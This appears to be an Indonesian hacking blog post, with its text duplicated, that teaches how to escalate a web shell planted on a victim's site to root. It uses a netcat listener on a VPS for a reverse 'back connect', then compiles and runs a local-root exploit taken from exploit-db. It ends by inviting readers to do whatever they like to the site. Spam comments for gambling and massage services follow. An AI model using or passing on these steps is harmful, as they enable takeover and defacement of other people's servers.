- Get link
- X
- Other Apps
Cara Back Connect Root Server
Hey Welcome Back Gannn
Yoyoyo mannn
Perkenalkan Mimin Tergans Tn.Infinity
Kali ini Gw akan share tutorial Back Connect Root Server
Klean pasti pernah Nemu web yang pas upshell eh ternyata red dir smua:v
GK ush khawatir gan,karena bisa ditanggulangi kok yah asw
Ok GK ush basa basi lgsung ke tutor
Bahan:
Localroot
VPS
Akses Shell ( Yang Udah ditanem di web korban )
Langkah pertama kita cek versi kernel web nya berapa dengan cara ketik:
uname -a
di fitur command yang ada di Shell backdoor klean
Nah kalau muncul versi kernel dibawah 2016 berarti bisa root Server yah su:v
Langkah kedua kita cari localroot nya dengan cara cari di exploit-db.com atau lgsung Dorking aja juga bisa kok:v
Kalau udh ketemu localroot nya kita upload localroot nya di dir yang writeable (hijau)
( Jangan lupa mampir ke video terbaru YouTube FCA yah https://youtu.be/VzxCgxBN1Tc )
Setelah itu Kalian Login VPS
Kalau Linux bisa lgsung pake terminal ketik:
ssh username@ipserver
Kalau windows bisa pakai putty
Langkah selanjutnya kita back connect
Ketik command:
nc -l 1337
Selanjutnya pilih fitur netsploit di Shell backdoor klean ,pada menu backconnect masukkan IP VPS dan port yang tadi lalu klik backconnect
Kalau sudah ,bakalan muncul uid gid dan groups
Lalu masuk ke dir yang tempat kalian upload localroot yang tadi
Jika localroot nya masih berekstensi .c
localroot.c maka compile dulu dengan ketik di command prompt:
gcc localroot.c -o shell
chmod 777 shell
./shell
Sampai muncul tulisan
sh: no job control in this shell
sh-3.1#
Ketik id maka akan muncul
uid=0(root) gid=0(root) groups=98(nobody)
Lalu cek Shell backdoor klean
Dan boomm.....
Dir rednya berubah menjadi hijau
Dan lalu terserah kalian mau apain tuh web kalau mau nebas backup dulu yah asu:v
Oke Thanks Udah Mampir
Hey Welcome Back Gannn
Yoyoyo mannn
Perkenalkan Mimin Tergans Tn.Infinity
Kali ini Gw akan share tutorial Back Connect Root Server
Klean pasti pernah Nemu web yang pas upshell eh ternyata red dir smua:v
GK ush khawatir gan,karena bisa ditanggulangi kok yah asw
Ok GK ush basa basi lgsung ke tutor
Bahan:
Localroot
VPS
Akses Shell ( Yang Udah ditanem di web korban )
Langkah pertama kita cek versi kernel web nya berapa dengan cara ketik:
uname -a
di fitur command yang ada di Shell backdoor klean
Nah kalau muncul versi kernel dibawah 2016 berarti bisa root Server yah su:v
Langkah kedua kita cari localroot nya dengan cara cari di exploit-db.com atau lgsung Dorking aja juga bisa kok:v
Kalau udh ketemu localroot nya kita upload localroot nya di dir yang writeable (hijau)
( Jangan lupa mampir ke video terbaru YouTube FCA yah https://youtu.be/VzxCgxBN1Tc )
Setelah itu Kalian Login VPS
Kalau Linux bisa lgsung pake terminal ketik:
ssh username@ipserver
Kalau windows bisa pakai putty
Langkah selanjutnya kita back connect
Ketik command:
nc -l 1337
Selanjutnya pilih fitur netsploit di Shell backdoor klean ,pada menu backconnect masukkan IP VPS dan port yang tadi lalu klik backconnect
Kalau sudah ,bakalan muncul uid gid dan groups
Lalu masuk ke dir yang tempat kalian upload localroot yang tadi
Jika localroot nya masih berekstensi .c
localroot.c maka compile dulu dengan ketik di command prompt:
gcc localroot.c -o shell
chmod 777 shell
./shell
Sampai muncul tulisan
sh: no job control in this shell
sh-3.1#
Ketik id maka akan muncul
uid=0(root) gid=0(root) groups=98(nobody)
Lalu cek Shell backdoor klean
Dan boomm.....
Dir rednya berubah menjadi hijau
Dan lalu terserah kalian mau apain tuh web kalau mau nebas backup dulu yah asu:v
Oke Thanks Udah Mampir
- Get link
- X
- Other Apps
Comments
Asu asu
ReplyDeleteLucky Charms Casino - WebJAR
ReplyDeleteLucky Charms 용인 출장마사지 Casino is a real time 전주 출장마사지 casino in the 광명 출장안마 USA. The gaming experience is streamed 바카라 사이트 from the comfort of your home. The 시흥 출장안마 casino offers a wide variety of